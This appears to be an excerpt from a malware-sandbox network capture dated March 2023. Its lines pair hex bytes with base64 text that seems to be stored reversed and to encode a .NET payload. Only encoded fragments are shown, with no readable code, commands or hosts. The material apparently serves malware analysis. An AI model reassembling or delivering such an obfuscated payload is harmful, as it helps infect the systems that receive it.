                                                                            Data Ascii: GVnbmFoQ2V0YXRTX2RkYQB0ZXNzYXRpY2lscHhlAHJldHRlU251UgByZXR0ZVN0c29QAHJldHRlU3JldHNpZ2VSAHJldHRlU2V0YWRpbGFWAHJldHRlU2VkdWxjbkkAbGVkb010ZXNzQQBsZWRvTWVnYW5hTQByZXR0ZVN0Y2VsZmVSAHJldHRlU3RudW9DAHJldHRlU3R1b2dvTAByZXR0ZVN0aW5JAHJldHRlU3BvUAByZXR0ZVNlbGJhc2lE
                                                                            2023-03-21 08:11:13 UTC4773INData Raw: 6d 56 77 62 33 4a 51 5a 58 52 68 62 48 56 6a 62 47 46 44 41 48 6c 30 63 6d 56 77 62 33 4a 51 5a 58 52 68 55 67 42 35 64 48 4a 6c 63 47 39 79 55 47 68 6a 64 47 46 51 41 48 6c 30 63 6d 56 77 62 33 4a 51 64 48 4a 68 64 46 4d 41 65 58 52 79 5a 58 42 76 63 6c 42 73 62 47 46 44 41 48 6c 30 63 6d 56 77 62 33 4a 51 5a 58 52 68 5a 47 6c 73 59 56 59 41 65 58 52 79 5a 58 42 76 63 6c 42 6c 63 6d 46 77 62 57 39 44 41 48 6c 30 63 6d 56 77 62 33 4a 51 64 47 4e 6c 62 47 56 54 41 48 6c 30 63 6d 56 77 62 33 4a 51 64 47 4e 6c 62 47 78 76 51 77 42 35 64 48 4a 6c 63 47 39 79 55 48 52 75 64 57 39 44 41 48 6c 30 63 6d 56 77 62 33 4a 51 5a 58 52 6c 62 47 56 45 41 48 6c 30 63 6d 56 77 62 33 4a 51 64 47 35 70 63 6c 41 41 65 58 52 79 5a 58 42 76 63 6c 42 30 64 57 39 6e 62 30 77 41
                                                                            Data Ascii: mVwb3JQZXRhbHVjbGFDAHl0cmVwb3JQZXRhUgB5dHJlcG9yUGhjdGFQAHl0cmVwb3JQdHJhdFMAeXRyZXBvclBsbGFDAHl0cmVwb3JQZXRhZGlsYVYAeXRyZXBvclBlcmFwbW9DAHl0cmVwb3JQdGNlbGVTAHl0cmVwb3JQdGNlbGxvQwB5dHJlcG9yUHRudW9DAHl0cmVwb3JQZXRlbGVEAHl0cmVwb3JQdG5pclAAeXRyZXBvclB0dW9nb0wA
                                                                            2023-03-21 08:11:13 UTC4789INData Raw: 56 52 30 62 32 64 79 62 30 59 41 61 33 4e 68 56 47 68 6a 63 6d 46 6c 55 77 42 72 63 32 46 55 63 47 46 4e 41 47 74 7a 59 56 52 30 59 32 56 73 5a 56 4d 41 61 33 4e 68 56 48 52 6a 5a 57 78 73 62 30 4d 41 61 33 4e 68 56 47 56 73 59 6d 46 7a 61 55 51 41 61 33 4e 68 56 47 56 30 59 57 78 31 59 32 78 68 51 77 42 72 63 32 46 55 5a 58 52 68 55 67 42 72 63 32 46 55 61 47 4e 30 59 56 41 41 63 32 56 31 62 47 46 57 5a 47 46 76 62 48 42 56 41 47 74 7a 59 56 52 30 63 6d 46 30 55 77 42 72 63 32 46 55 62 47 78 68 51 77 42 72 63 32 46 55 5a 58 52 68 5a 47 6c 73 59 56 59 41 61 33 4e 68 56 47 56 79 59 58 42 74 62 30 4d 41 5a 57 31 70 56 47 78 68 63 33 4a 6c 64 6d 6c 75 56 57 39 55 41 48 64 76 54 6c 39 30 5a 57 63 41 5a 47 52 42 41 47 56 74 61 56 52 6c 64 47 46 45 41 47 52 6c
                                                                            Data Ascii: VR0b2dyb0YAa3NhVGhjcmFlUwBrc2FUcGFNAGtzYVR0Y2VsZVMAa3NhVHRjZWxsb0MAa3NhVGVsYmFzaUQAa3NhVGV0YWx1Y2xhQwBrc2FUZXRhUgBrc2FUaGN0YVAAc2V1bGFWZGFvbHBVAGtzYVR0cmF0UwBrc2FUbGxhQwBrc2FUZXRhZGlsYVYAa3NhVGVyYXBtb0MAZW1pVGxhc3JldmluVW9UAHdvTl90ZWcAZGRBAGVtaVRldGFEAGRl
                                                                            2023-03-21 08:11:13 UTC4805INData Raw: 46 46 54 41 47 35 76 61 58 52 77 5a 57 4e 34 52 57 4a 45 41 47 35 76 61 58 52 77 5a 57 4e 34 52 57 56 30 61 55 78 52 55 77 42 7a 64 47 35 68 64 48 4e 75 62 30 4e 6c 62 6d 6c 6d 5a 55 52 6c 64 47 6c 4d 55 56 4d 41 63 6d 56 30 64 47 56 54 5a 58 52 68 5a 47 6c 6b 62 6d 46 44 41 48 4a 6c 5a 47 46 6c 55 6d 46 30 59 55 52 69 52 41 42 79 5a 57 52 68 5a 56 4a 68 64 47 46 45 5a 58 52 70 54 46 46 54 41 48 4a 6c 64 48 42 68 5a 45 46 68 64 47 46 45 59 6b 51 41 63 6d 56 30 63 47 46 6b 51 57 46 30 59 55 52 6c 64 47 6c 4d 55 56 4d 41 63 6d 56 79 59 58 42 74 62 30 4e 6e 62 6d 6c 79 64 46 4e 6c 62 57 46 4f 5a 58 42 35 56 41 42 6e 62 6d 6c 77 63 47 46 4e 5a 58 42 35 56 47 4a 45 5a 58 52 70 54 46 46 54 41 48 42 68 54 57 56 77 65 56 52 69 52 47 56 30 61 55 78 52 55 77 42 6c
                                                                            Data Ascii: FFTAG5vaXRwZWN4RWJEAG5vaXRwZWN4RWV0aUxRUwBzdG5hdHNub0NlbmlmZURldGlMUVMAcmV0dGVTZXRhZGlkbmFDAHJlZGFlUmF0YURiRAByZWRhZVJhdGFEZXRpTFFTAHJldHBhZEFhdGFEYkQAcmV0cGFkQWF0YURldGlMUVMAcmVyYXBtb0NnbmlydFNlbWFOZXB5VABnbmlwcGFNZXB5VGJEZXRpTFFTAHBhTWVweVRiRGV0aUxRUwBl
                                                                            2023-03-21 08:11:13 UTC4821INData Raw: 52 51 42 44 51 45 4f 41 51 77 42 44 51 45 4c 41 51 77 42 42 67 45 48 41 51 55 42 42 67 45 45 41 51 55 42 41 77 45 45 41 51 45 42 41 77 44 2b 41 4e 4d 41 2f 51 44 53 41 50 59 41 30 51 44 72 41 4e 41 41 36 51 44 4f 41 4f 67 41 79 41 44 69 41 4d 63 41 34 41 43 2b 41 4e 38 41 75 41 44 64 41 4c 55 41 31 41 43 79 41 4e 41 41 73 51 43 6f 41 4b 49 41 67 41 43 43 41 48 73 41 66 67 42 34 41 48 73 41 63 77 42 36 41 48 49 41 65 51 42 73 41 48 59 41 59 51 42 31 41 45 30 41 61 51 41 2f 41 47 67 41 50 67 42 6c 41 44 30 41 5a 41 41 37 41 46 73 41 4e 77 42 57 41 44 59 41 50 77 41 31 41 44 6f 41 4d 77 41 35 41 43 38 41 4b 51 41 72 41 43 67 41 4a 67 41 6e 41 41 51 41 49 77 41 42 41 43 49 44 4e 41 41 41 32 35 34 41 41 41 4d 30 41 41 44 62 6e 67 41 41 41 4e 59 41 41 4d 6c 67
                                                                            Data Ascii: RQBDQEOAQwBDQELAQwBBgEHAQUBBgEEAQUBAwEEAQEBAwD+ANMA/QDSAPYA0QDrANAA6QDOAOgAyADiAMcA4AC+AN8AuADdALUA1ACyANAAsQCoAKIAgACCAHsAfgB4AHsAcwB6AHIAeQBsAHYAYQB1AE0AaQA/AGgAPgBlAD0AZAA7AFsANwBWADYAPwA1ADoAMwA5AC8AKQArACgAJgAnAAQAIwABACIDNAAA254AAAM0AADbngAAANYAAMlg
                                                                            2023-03-21 08:11:13 UTC4837INData Raw: 6c 59 48 55 54 33 36 41 41 43 78 79 41 61 5a 50 65 4d 41 41 43 72 51 41 61 6b 39 79 67 41 41 56 7a 77 45 61 54 67 57 41 41 43 68 6d 41 45 78 50 63 51 41 41 44 67 67 42 78 6b 39 70 67 41 41 6e 34 59 42 2b 54 68 71 41 41 42 55 66 41 44 70 4f 44 51 41 41 43 5a 54 42 78 6b 41 4e 77 41 41 4e 6c 59 44 38 54 31 38 41 41 41 6c 6c 51 4a 5a 41 44 63 41 41 44 5a 57 41 54 45 41 4e 77 41 41 4a 75 49 47 4b 54 31 32 41 41 42 56 43 51 42 42 41 44 63 41 41 47 70 56 41 4e 51 48 74 41 41 41 55 47 6f 41 31 41 65 30 41 41 42 51 61 67 44 63 44 78 67 41 41 49 68 44 41 69 6b 48 76 41 41 41 72 42 4d 47 4b 51 65 34 41 41 43 67 56 51 45 78 50 53 30 41 41 42 77 77 42 76 45 39 4b 41 41 41 4b 48 63 42 49 51 52 66 41 41 43 6f 36 41 5a 35 50 47 51 41 41 44 71 57 42 73 45 45 58 77 41 41
                                                                            Data Ascii: lYHUT36AACxyAaZPeMAACrQAak9ygAAVzwEaTgWAAChmAExPcQAADggBxk9pgAAn4YB+ThqAABUfADpODQAACZTBxkANwAANlYD8T18AAAllQJZADcAADZWATEANwAAJuIGKT12AABVCQBBADcAAGpVANQHtAAAUGoA1Ae0AABQagDcDxgAAIhDAikHvAAArBMGKQe4AACgVQExPS0AABwwBvE9KAAAKHcBIQRfAACo6AZ5PGQAADqWBsEEXwAA
                                                                            2023-03-21 08:11:13 UTC4853INData Raw: 41 44 69 4f 51 41 46 41 41 41 41 41 4f 49 30 41 41 51 41 41 41 41 42 4a 4f 51 41 41 77 41 41 41 41 45 6b 33 51 41 43 41 41 41 41 41 53 54 56 41 41 45 41 41 41 41 42 4a 4e 55 41 41 51 41 41 41 41 45 6b 31 51 41 43 41 41 41 41 41 53 54 49 41 41 45 41 41 41 41 42 4a 4d 67 41 41 51 41 41 41 41 45 6b 79 41 41 42 41 41 41 41 41 53 54 4f 41 41 49 41 41 41 41 42 4a 4d 67 41 41 51 41 41 41 41 45 49 4f 77 41 47 41 41 41 41 41 53 54 49 41 41 55 41 41 41 41 41 34 6a 6b 41 42 41 41 41 41 41 44 69 4e 41 41 44 41 41 41 41 41 53 54 44 41 41 49 41 41 41 41 41 62 37 51 41 41 51 41 41 41 41 45 49 4f 77 41 47 41 41 41 41 41 53 54 49 41 41 55 41 41 41 41 41 34 6a 6b 41 42 41 41 41 41 41 44 69 4e 41 41 44 41 41 41 41 41 53 54 44 41 41 49 41 41 41 41 41 62 37 51 41 41 51 41 41
                                                                            Data Ascii: ADiOQAFAAAAAOI0AAQAAAABJOQAAwAAAAEk3QACAAAAASTVAAEAAAABJNUAAQAAAAEk1QACAAAAASTIAAEAAAABJMgAAQAAAAEkyAABAAAAASTOAAIAAAABJMgAAQAAAAEIOwAGAAAAASTIAAUAAAAA4jkABAAAAADiNAADAAAAASTDAAIAAAAAb7QAAQAAAAEIOwAGAAAAASTIAAUAAAAA4jkABAAAAADiNAADAAAAASTDAAIAAAAAb7QAAQAA
                                                                            2023-03-21 08:11:13 UTC4869INData Raw: 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41
                                                                            Data Ascii: AAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAA
                                                                            2023-03-21 08:11:13 UTC4885INData Raw: 41 42 53 42 67 41 43 41 41 41 41 41 45 6a 53 41 41 45 41 41 41 41 41 55 64 41 41 41 77 41 41 41 41 42 52 79 41 41 43 41 41 41 41 41 43 39 4e 41 41 45 41 41 41 41 41 4e 49 49 41 41 77 41 41 41 41 42 52 73 77 41 43 41 41 41 41 41 44 2f 7a 41 41 45 41 41 41 41 41 52 75 41 41 41 51 41 41 41 41 42 52 55 51 41 42 41 41 41 41 41 46 46 52 41 41 45 41 41 41 41 41 55 56 45 41 41 51 41 41 41 41 42 52 55 51 41 42 41 41 41 41 41 46 46 43 41 41 45 41 41 41 41 41 55 45 38 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 46 42 50 41 41 45 41 41 41 41 41 55 4d 59 41 41 77 41 41 41 41 42 51 70 67 41 43 41 41 41 41 41 46 43 69 41 41 45 41 41 41 41 41 55 4b 59 41 41 67 41 41 41 41 42 51 6f 67 41 42 41 41 41 41 41 46 43 48 41 41 51 41 41 41 41 41 55 48 30 41 41 77 41 41
                                                                            Data Ascii: ABSBgACAAAAAEjSAAEAAAAAUdAAAwAAAABRyAACAAAAAC9NAAEAAAAANIIAAwAAAABRswACAAAAAD/zAAEAAAAARuAAAQAAAABRUQABAAAAAFFRAAEAAAAAUVEAAQAAAABRUQABAAAAAFFCAAEAAAAAUE8AAQAAAAAeCAABAAAAAFBPAAEAAAAAUMYAAwAAAABQpgACAAAAAFCiAAEAAAAAUKYAAgAAAABQogABAAAAAFCHAAQAAAAAUH0AAwAA
                                                                            2023-03-21 08:11:13 UTC4901INData Raw: 4d 59 41 41 41 41 4a 57 61 41 51 6f 57 67 59 41 41 45 37 34 51 44 47 41 41 41 41 43 56 6d 41 45 4a 78 6f 47 41 41 41 4a 5a 55 41 78 67 41 41 41 41 6c 5a 61 42 43 61 62 4a 45 41 41 55 71 49 41 63 51 41 41 41 41 4a 57 4b 51 51 6d 57 79 4b 41 41 46 4b 64 41 48 45 41 41 41 41 43 56 65 51 45 4a 68 73 67 77 41 42 53 6c 55 42 78 41 41 41 41 41 6c 58 4c 42 43 58 62 49 4d 41 41 55 6f 30 41 63 51 41 41 41 41 4a 56 78 77 51 6c 78 75 72 41 41 46 4b 48 77 48 45 41 41 41 41 43 56 63 59 45 4a 59 41 71 51 41 41 41 46 6f 59 68 67 41 41 41 41 6c 57 76 42 43 57 43 55 41 41 41 55 6e 6a 41 4a 4d 41 41 41 41 4a 56 72 41 51 6c 67 61 31 41 41 46 4a 31 41 43 54 41 41 41 41 43 56 61 6b 45 4a 52 73 59 41 41 42 53 63 55 41 6b 77 41 41 41 41 6c 57 6b 42 43 53 62 46 63 41 41 55 6d 31
                                                                            Data Ascii: MYAAAAJWaAQoWgYAAE74QDGAAAACVmAEJxoGAAAJZUAxgAAAAlZaBCabJEAAUqIAcQAAAAJWKQQmWyKAAFKdAHEAAAACVeQEJhsgwABSlUBxAAAAAlXLBCXbIMAAUo0AcQAAAAJVxwQlxurAAFKHwHEAAAACVcYEJYAqQAAAFoYhgAAAAlWvBCWCUAAAUnjAJMAAAAJVrAQlga1AAFJ1ACTAAAACVakEJRsYAABScUAkwAAAAlWkBCSbFcAAUm1
                                                                            2023-03-21 08:11:13 UTC4917INData Raw: 4a 4d 41 41 41 41 49 63 4b 77 4e 47 51 4f 73 41 41 45 6a 64 51 43 54 41 41 41 41 43 48 43 6b 44 52 6b 44 72 41 41 42 49 32 49 41 6b 77 41 41 41 41 68 77 6e 41 30 5a 46 65 51 41 41 53 4e 4f 41 4a 4d 41 41 41 41 49 63 49 67 4e 47 52 74 30 41 41 45 6a 4f 77 43 54 41 41 41 41 43 48 42 34 44 52 6b 56 33 67 41 42 49 79 6b 41 6b 77 41 41 41 41 68 77 61 41 30 5a 41 31 59 41 41 53 4d 45 41 4a 4d 41 41 41 41 49 63 46 77 4e 47 54 33 51 41 41 45 69 38 51 43 54 41 41 41 41 43 48 42 49 44 52 6c 68 55 67 41 42 49 75 41 41 6b 77 41 41 41 41 68 77 4e 41 30 5a 41 31 59 41 41 53 4c 4c 41 4a 4d 41 41 41 41 49 63 43 67 4e 47 51 4e 57 41 41 45 69 6e 67 43 54 41 41 41 41 43 48 41 63 44 52 6b 44 6b 51 41 42 49 6f 73 41 6b 77 41 41 41 41 68 77 44 41 30 5a 43 4d 41 41 41 53 4a 33
                                                                            Data Ascii: JMAAAAIcKwNGQOsAAEjdQCTAAAACHCkDRkDrAABI2IAkwAAAAhwnA0ZFeQAASNOAJMAAAAIcIgNGRt0AAEjOwCTAAAACHB4DRkV3gABIykAkwAAAAhwaA0ZA1YAASMEAJMAAAAIcFwNGT3QAAEi8QCTAAAACHBIDRlhUgABIuAAkwAAAAhwNA0ZA1YAASLLAJMAAAAIcCgNGQNWAAEingCTAAAACHAcDRkDkQABIosAkwAAAAhwDA0ZCMAAASJ3
                                                                            2023-03-21 08:11:13 UTC4933INData Raw: 49 59 41 41 41 41 48 55 34 41 4a 63 56 47 71 41 41 44 67 48 77 43 54 41 41 41 41 42 31 4e 6b 43 57 35 52 6e 41 41 41 34 42 49 41 6b 77 41 41 41 41 64 54 4d 41 6c 75 55 5a 55 41 41 4f 41 48 41 4a 4d 41 41 41 41 48 55 79 51 4a 62 53 67 34 41 41 44 66 2b 41 43 54 41 41 41 41 42 31 4d 4d 43 57 30 5a 49 77 41 41 33 2b 77 41 6b 77 41 41 41 41 64 53 2f 41 6c 74 4b 53 4d 41 41 4e 2f 66 41 4a 4d 41 41 41 41 48 55 76 41 4a 62 51 4e 57 41 41 44 66 30 51 43 54 41 41 41 41 42 31 4c 6b 43 57 30 49 77 41 41 41 33 38 59 41 6b 77 41 41 41 41 64 53 31 41 6c 74 41 31 59 41 41 4e 2b 36 41 4a 4d 41 41 41 41 48 55 73 67 4a 62 51 4e 67 41 41 44 66 72 41 43 54 41 41 41 41 42 31 4b 38 43 57 30 44 56 67 41 41 33 35 38 41 6b 77 41 41 41 41 64 53 73 41 6c 74 43 55 55 41 41 4e 2b 54
                                                                            Data Ascii: IYAAAAHU4AJcVGqAADgHwCTAAAAB1NkCW5RnAAA4BIAkwAAAAdTMAluUZUAAOAHAJMAAAAHUyQJbSg4AADf+ACTAAAAB1MMCW0ZIwAA3+wAkwAAAAdS/AltKSMAAN/fAJMAAAAHUvAJbQNWAADf0QCTAAAAB1LkCW0IwAAA38YAkwAAAAdS1AltA1YAAN+6AJMAAAAHUsgJbQNgAADfrACTAAAAB1K8CW0DVgAA358AkwAAAAdSsAltCUUAAN+T
                                                                            2023-03-21 08:11:13 UTC4949INData Raw: 4a 4d 41 41 41 41 47 4a 75 77 48 48 51 61 31 41 41 43 73 69 67 43 54 41 41 41 41 42 69 62 67 42 78 30 4a 51 41 41 41 72 48 77 41 6b 77 41 41 41 41 59 6d 31 41 63 64 41 36 77 41 41 4b 78 71 41 4a 4d 41 41 41 41 47 4a 73 77 48 48 51 6c 41 41 41 43 73 57 51 43 54 41 41 41 41 42 69 62 41 42 78 30 4a 51 41 41 41 72 45 67 41 6b 77 41 41 41 41 59 6d 74 41 63 64 45 45 38 41 41 4b 77 33 41 4a 4d 41 41 41 41 47 4a 71 41 48 48 51 4e 57 41 41 43 73 4a 67 43 54 41 41 41 41 42 69 61 55 42 78 30 44 57 77 41 41 72 41 55 41 6b 77 41 41 41 41 59 6d 69 41 63 64 43 55 55 41 41 4b 76 7a 41 4a 4d 41 41 41 41 47 4a 6e 67 48 48 51 4e 57 41 41 43 72 33 77 43 54 41 41 41 41 42 69 5a 73 42 78 30 4d 6d 77 41 41 71 39 41 41 6b 77 41 41 41 41 59 6d 59 41 63 64 41 31 73 41 41 4b 76 41
                                                                            Data Ascii: JMAAAAGJuwHHQa1AACsigCTAAAABibgBx0JQAAArHwAkwAAAAYm1AcdA6wAAKxqAJMAAAAGJswHHQlAAACsWQCTAAAABibABx0JQAAArEgAkwAAAAYmtAcdEE8AAKw3AJMAAAAGJqAHHQNWAACsJgCTAAAABiaUBx0DWwAArAUAkwAAAAYmiAcdCUUAAKvzAJMAAAAGJngHHQNWAACr3wCTAAAABiZsBx0MmwAAq9AAkwAAAAYmYAcdA1sAAKvA
                                                                            2023-03-21 08:11:13 UTC4965INData Raw: 73 4d 41 41 41 41 45 4b 64 77 45 68 52 33 41 41 41 42 63 2f 41 4c 44 41 41 41 41 42 43 6d 77 42 49 51 64 75 77 41 41 58 4f 6b 43 77 77 41 41 41 41 51 70 71 41 53 44 42 68 45 41 41 46 7a 57 41 73 4d 41 41 41 41 45 4b 61 41 45 67 68 32 32 41 41 42 63 77 67 4c 44 41 41 41 41 42 43 6d 59 42 48 30 64 72 41 41 41 58 4b 4d 43 77 77 41 41 41 41 51 6e 35 41 52 37 48 59 77 41 41 46 78 49 41 73 4d 41 41 41 41 45 4a 71 67 45 64 78 32 67 41 41 42 63 58 51 4c 44 41 41 41 41 42 43 56 41 42 48 4d 64 6c 67 41 41 58 46 30 43 77 77 41 41 41 41 51 6a 78 41 52 76 48 57 73 41 41 46 76 5a 41 73 4d 41 41 41 41 45 49 73 41 45 61 42 31 35 41 41 42 63 43 41 4c 44 41 41 41 41 42 43 47 67 42 47 63 47 45 51 41 41 58 49 4d 43 77 77 41 41 41 41 51 68 6d 41 52 6c 48 50 63 41 41 46 76 53
                                                                            Data Ascii: sMAAAAEKdwEhR3AAABc/ALDAAAABCmwBIQduwAAXOkCwwAAAAQpqASDBhEAAFzWAsMAAAAEKaAEgh22AABcwgLDAAAABCmYBH0drAAAXKMCwwAAAAQn5AR7HYwAAFxIAsMAAAAEJqgEdx2gAABcXQLDAAAABCVABHMdlgAAXF0CwwAAAAQjxARvHWsAAFvZAsMAAAAEIsAEaB15AABcCALDAAAABCGgBGcGEQAAXIMCwwAAAAQhmARlHPcAAFvS
                                                                            2023-03-21 08:11:13 UTC4981INData Raw: 4a 4d 41 41 41 41 42 68 63 67 42 6b 41 4f 52 41 41 41 78 2f 77 43 54 41 41 41 41 41 59 57 34 41 5a 41 4a 76 51 41 41 4d 65 30 41 6b 77 41 41 41 41 47 46 70 41 47 50 41 34 73 41 41 44 48 63 41 4a 4d 41 41 41 41 42 68 5a 51 42 6a 77 4e 57 41 41 41 78 79 77 43 54 41 41 41 41 41 59 57 49 41 59 38 44 56 67 41 41 4d 62 6f 41 6b 77 41 41 41 41 47 46 66 41 47 50 43 55 41 41 41 44 47 69 41 4a 4d 41 41 41 41 42 68 58 41 42 6a 77 4e 57 41 41 41 78 6c 41 43 54 41 41 41 41 41 59 56 6b 41 59 38 44 56 67 41 41 4d 59 49 41 6b 77 41 41 41 41 47 46 57 41 47 50 41 35 45 41 41 44 46 6c 41 4a 4d 41 41 41 41 42 68 55 67 42 6a 77 30 6a 41 41 41 78 56 51 43 54 41 41 41 41 41 59 56 41 41 59 38 43 2f 67 41 41 4d 55 55 41 6b 77 41 41 41 41 47 46 4e 41 47 50 41 75 77 41 41 44 45 32
                                                                            Data Ascii: JMAAAABhcgBkAORAAAx/wCTAAAAAYW4AZAJvQAAMe0AkwAAAAGFpAGPA4sAADHcAJMAAAABhZQBjwNWAAAxywCTAAAAAYWIAY8DVgAAMboAkwAAAAGFfAGPCUAAADGiAJMAAAABhXABjwNWAAAxlACTAAAAAYVkAY8DVgAAMYIAkwAAAAGFWAGPA5EAADFlAJMAAAABhUgBjw0jAAAxVQCTAAAAAYVAAY8C/gAAMUUAkwAAAAGFNAGPAuwAADE2
                                                                            2023-03-21 08:11:13 UTC4997INData Raw: 61 55 41 41 4e 63 2f 67 46 59 70 70 51 41 41 31 79 32 41 56 69 6d 6c 41 41 44 58 47 34 42 57 4b 61 55 41 41 4e 63 4d 67 46 59 70 70 51 41 41 31 76 6d 41 56 69 6d 6c 41 41 44 57 37 49 42 57 4b 61 55 41 41 4e 62 65 67 46 59 70 70 51 41 41 31 74 43 41 56 69 6d 6c 41 41 44 57 78 49 42 57 4b 61 55 41 41 4e 61 78 67 46 59 70 70 51 41 41 31 71 47 41 56 69 6d 6c 41 41 44 57 6c 6f 42 57 4b 61 55 41 41 4e 61 41 67 46 59 70 70 51 41 41 31 6d 79 41 56 69 6d 6c 41 41 44 57 57 59 42 57 4b 61 55 41 41 4e 5a 4f 67 46 59 70 70 51 41 41 31 6b 4b 41 56 69 6d 6c 41 41 44 57 4d 34 42 57 4b 61 55 41 41 4e 59 68 67 46 59 70 70 51 41 41 31 68 61 41 56 69 6d 6c 41 41 44 57 41 34 42 57 4b 61 55 41 41 4e 58 34 67 46 59 70 70 51 41 41 31 65 75 41 56 69 6d 6c 41 41 44 56 33 59 42 57
                                                                            Data Ascii: aUAANc/gFYppQAA1y2AVimlAADXG4BWKaUAANcMgFYppQAA1vmAVimlAADW7IBWKaUAANbegFYppQAA1tCAVimlAADWxIBWKaUAANaxgFYppQAA1qGAVimlAADWloBWKaUAANaAgFYppQAA1myAVimlAADWWYBWKaUAANZOgFYppQAA1kKAVimlAADWM4BWKaUAANYhgFYppQAA1haAVimlAADWA4BWKaUAANX4gFYppQAA1euAVimlAADV3YBW
                                                                            2023-03-21 08:11:13 UTC5013INData Raw: 33 45 41 41 41 45 46 41 48 49 41 4c 67 42 35 41 41 41 41 41 41 41 41 41 32 67 41 41 41 45 46 41 47 34 41 49 77 42 78 41 41 41 41 41 41 41 41 41 36 30 41 45 41 47 41 41 47 6f 41 49 77 42 35 41 41 41 41 41 41 41 41 41 32 41 41 41 41 45 46 41 47 59 41 49 77 42 35 41 41 41 41 41 41 41 41 41 30 51 41 41 41 45 46 41 47 49 41 49 77 42 35 41 41 41 41 41 41 41 41 41 36 6b 41 41 41 45 46 41 46 34 41 49 77 42 35 41 41 41 41 41 41 41 41 41 36 55 41 41 41 45 46 41 46 6f 41 49 77 42 35 41 41 41 41 41 41 41 41 41 36 45 41 41 41 45 46 41 46 59 41 49 77 42 35 41 41 41 41 41 41 41 41 41 35 30 41 41 41 45 46 41 46 49 41 49 77 42 35 41 41 41 41 41 41 41 41 41 35 55 41 41 41 45 46 41 45 34 41 49 77 42 35 41 41 41 41 41 41 41 41 41 34 63 41 41 41 45 46 41 45 6f 41 49 77 42 35
                                                                            Data Ascii: 3EAAAEFAHIALgB5AAAAAAAAA2gAAAEFAG4AIwBxAAAAAAAAA60AEAGAAGoAIwB5AAAAAAAAA2AAAAEFAGYAIwB5AAAAAAAAA0QAAAEFAGIAIwB5AAAAAAAAA6kAAAEFAF4AIwB5AAAAAAAAA6UAAAEFAFoAIwB5AAAAAAAAA6EAAAEFAFYAIwB5AAAAAAAAA50AAAEFAFIAIwB5AAAAAAAAA5UAAAEFAE4AIwB5AAAAAAAAA4cAAAEFAEoAIwB5
                                                                            2023-03-21 08:11:13 UTC5029INData Raw: 48 4d 42 45 51 4c 2f 2f 2f 38 4c 4f 41 41 41 41 41 4d 67 4a 76 2f 2f 2f 78 59 36 42 41 41 46 78 6e 73 45 41 41 58 48 66 67 41 41 41 41 6f 67 41 41 41 41 4e 6a 6f 4b 41 41 51 37 4b 41 51 41 42 56 35 38 41 76 2f 2f 2f 7a 6f 34 41 41 41 41 42 69 41 6d 2f 2f 2f 2f 52 54 6f 45 41 41 57 49 65 77 51 41 42 63 64 2b 41 41 41 41 41 69 41 41 41 41 44 56 4f 51 6f 41 41 58 38 6f 42 41 41 46 58 58 77 43 41 41 41 42 4b 7a 67 45 41 41 56 66 66 51 6f 41 41 57 78 7a 41 66 34 57 41 66 34 57 41 68 45 43 2f 2f 2f 2f 67 54 67 41 41 41 41 42 49 43 62 2f 2f 2f 2b 4d 4f 67 51 41 42 59 39 37 42 41 41 46 78 33 34 41 41 41 41 42 49 41 51 41 42 56 78 39 42 67 41 53 65 79 67 46 45 51 4a 36 42 67 41 4b 52 6e 4e 77 41 4c 5a 79 63 67 51 52 41 41 41 41 78 6a 67 41 41 41 43 30 41 41 41 42
                                                                            Data Ascii: HMBEQL///8LOAAAAAMgJv///xY6BAAFxnsEAAXHfgAAAAogAAAANjoKAAQ7KAQABV58Av///zo4AAAABiAm////RToEAAWIewQABcd+AAAAAiAAAADVOQoAAX8oBAAFXXwCAAABKzgEAAVffQoAAWxzAf4WAf4WAhEC////gTgAAAABICb///+MOgQABY97BAAFx34AAAABIAQABVx9BgASeygFEQJ6BgAKRnNwALZycgQRAAAAxjgAAAC0AAAB
                                                                            2023-03-21 08:11:13 UTC5045INData Raw: 41 59 41 45 66 63 6f 41 77 51 41 42 54 64 37 41 76 2f 2f 2f 35 73 34 41 41 41 41 41 43 41 6d 2f 2f 2f 2f 70 6a 6b 45 41 41 57 62 65 77 51 41 42 63 64 2b 41 41 41 41 41 43 41 47 41 42 48 64 4b 41 4c 2f 2f 2f 2f 41 4f 41 41 41 41 41 45 67 4a 76 2f 2f 2f 38 73 35 42 41 41 46 76 6e 73 45 41 41 58 48 66 67 41 41 41 41 41 67 41 41 41 41 65 54 6b 42 45 51 41 41 41 45 73 34 41 41 41 41 61 41 41 41 41 43 73 41 41 41 42 34 41 41 41 41 55 41 41 41 41 41 52 46 41 41 41 4d 2f 67 41 41 41 41 41 34 41 41 41 4f 2f 67 41 41 41 41 4d 67 45 51 41 41 68 67 41 41 41 4b 30 41 41 7a 41 54 41 43 6f 47 41 41 32 42 4b 41 51 41 42 54 64 37 41 76 2f 2f 2f 38 49 34 41 41 41 41 41 43 41 6d 2f 2f 2f 2f 7a 54 6b 45 41 41 57 39 65 77 51 41 42 63 64 2b 41 41 41 41 41 43 41 47 41 42 48 64
